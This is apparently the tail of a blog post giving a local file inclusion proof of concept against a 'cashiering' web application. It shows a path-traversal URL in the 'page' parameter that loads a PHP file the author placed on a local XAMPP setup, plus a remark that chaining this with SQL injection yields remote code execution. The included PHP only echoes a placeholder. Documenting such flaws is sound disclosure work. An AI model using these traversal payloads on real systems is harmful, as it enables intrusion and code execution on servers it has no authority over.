http://localhost/cashiering/?page=../../../exploit
In this case I used XAMPP and I put a file named exploit.php in C:\ with the following content:
<?php echo"php code to get RCE"; ?>
notice that chaining this with SQLi vulnerabilities you can get RCE))
Comentarios
Publicar un comentario